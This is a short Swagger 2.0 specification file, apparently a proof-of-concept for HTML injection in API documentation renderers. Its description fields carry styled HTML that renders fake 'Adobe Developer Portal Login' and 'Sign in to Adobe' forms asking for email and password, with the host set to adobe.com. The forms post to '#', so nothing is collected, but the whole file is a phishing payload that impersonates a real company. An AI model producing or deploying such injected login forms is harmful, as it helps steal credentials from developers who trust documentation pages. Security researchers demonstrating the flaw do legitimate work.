swagger: "2.0"
info:
  title: Fake Login Injection
  description: |
    <style>
      .phish-form {
        background: #f8f8f8;
        padding: 16px;
        border: 1px solid #ccc;
        width: 300px;
        font-family: Arial, sans-serif;
      }
      .phish-form input {
        width: 100%;
        margin-bottom: 10px;
        padding: 8px;
        border: 1px solid #aaa;
      }
      .phish-form button {
        width: 100%;
        background: #0070f3;
        color: white;
        padding: 10px;
        border: none;
        cursor: pointer;
      }
    </style>

    <div class="phish-form">
      <h3>Adobe Developer Portal Login</h3>
      <form action="#" method="POST">
        <input type="text" placeholder="Email" name="email" required>
        <input type="password" placeholder="Password" name="password" required>
        <button type="submit">Login</button>
      </form>
    </div>
  version: "1.0"
host: adobe.com
basePath: /
schemes:
  - https
paths:
  /phish:
    get:
      summary: Fake login form injection
      description: |
        <div class="phish-form">
          <h3>Sign in to Adobe</h3>
          <form action="#" method="POST">
            <input type="text" placeholder="Username">
            <input type="password" placeholder="Password">
            <button>Login</button>
          </form>
        </div>
      responses:
        '200':
          description: No response defined
